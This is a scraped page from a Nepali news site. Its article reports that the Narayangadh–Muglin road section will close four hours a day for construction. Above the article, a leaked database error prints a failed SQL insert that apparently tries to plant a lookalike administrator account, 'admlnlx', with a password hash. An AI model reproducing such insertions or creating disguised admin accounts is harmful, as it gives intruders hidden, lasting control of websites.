WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.L2iB/iC0jDGmxlpyQc82/qm8cZmF.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:28:20', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नारायणगढ–मुग्लिन खण्ड फेरी ४ घण्टा बन्द हुने – Gaule Khabar

नारायणगढ–मुग्लिन खण्ड फेरी ४ घण्टा बन्द हुने

नारायणगढ–मुग्लिन खण्ड फेरी ४ घण्टा बन्द हुने

चितवन, मंसिर ३०–

चितवनको नारायणगढ–मुग्लिन सडक खण्ड फेरी दैनिक ४ घण्टा बन्द हुने भएको छ ।
यही पुस ७ गतेदेखि लागु हुनेगरि विहान ११ बजेदेखि दिउँसो ३ बजेसम्म सडक खण्ड बन्द हुने नारायणगढ–मुग्लिन सडक आयोजनाले जनाएको छ ।
आज एक सूचना जारी गर्दै दैनिक चार घण्टा सडक खण्ड बन्दगरि निर्माण कार्यलाई तिव्रता दिईने जनाएको हो । दशैं अघि पनि दैनिक चार घण्टा सडक बन्दगरि निर्माण काम हुने गरेको थियो ।

muglin-notice

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका